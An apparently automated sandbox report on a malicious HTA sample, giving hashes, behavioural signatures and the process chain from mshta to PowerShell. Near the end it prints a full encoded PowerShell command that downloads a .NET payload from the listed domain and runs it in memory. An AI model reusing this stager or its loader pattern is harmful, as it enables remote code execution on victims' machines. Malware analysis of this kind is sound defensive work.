Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
30/05/2024, 01:23
Static task
static1
Behavioral task
behavioral1
Sample
9680a923973fc87e61964a372b083cb9420a4e6c721471806560a3489a649b88.hta
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
9680a923973fc87e61964a372b083cb9420a4e6c721471806560a3489a649b88.hta
Resource
win10v2004-20240508-en
General
-
Target
9680a923973fc87e61964a372b083cb9420a4e6c721471806560a3489a649b88.hta
-
Size
799B
-
MD5
9b3779b6e809642232e8e7e187a72f0d
-
SHA1
fd7027dc0258952655350a794854135452632fb3
-
SHA256
9680a923973fc87e61964a372b083cb9420a4e6c721471806560a3489a649b88
-
SHA512
3dbba3efa22911744f8be7fc87d8ac68a32f1a4b001af084c57bafe6b446a597417eb2fcab474dce66bbff0e4c04201acfee47c15c74dc9fae58679318e19da0
Malware Config
Extracted
http://powershell.skype-api.co.uk:80/download/ironpython/
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2212 powershell.exe -
pid Process 2212 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2212 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1096 wrote to memory of 2212 1096 mshta.exe 28 PID 1096 wrote to memory of 2212 1096 mshta.exe 28 PID 1096 wrote to memory of 2212 1096 mshta.exe 28 PID 1096 wrote to memory of 2212 1096 mshta.exe 28
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9680a923973fc87e61964a372b083cb9420a4e6c721471806560a3489a649b88.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABiAHkAdABlAHMAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAIgBoAHQAdABwADoALwAvAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBzAGsAeQBwAGUALQBhAHAAaQAuAGMAbwAuAHUAawA6ADgAMAAvAGQAbwB3AG4AbABvAGEAZAAvAGkAcgBvAG4AcAB5AHQAaABvAG4ALwAiACkAOwAkAGEAcwBzAGUAbQBiAGwAeQA9AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBsAG8AYQBkACgAJABiAHkAdABlAHMAKQA7ACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUAByAG8AZwByAGEAbQAiACkALgBHAGUAdABNAGUAdABoAG8AZAAoACIATQBhAGkAbgAiACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAOwA=2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
-